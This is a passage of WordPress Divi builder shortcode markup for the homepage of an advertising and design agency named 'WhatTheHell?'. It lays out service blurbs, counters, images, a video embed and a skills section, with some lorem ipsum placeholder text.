animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" 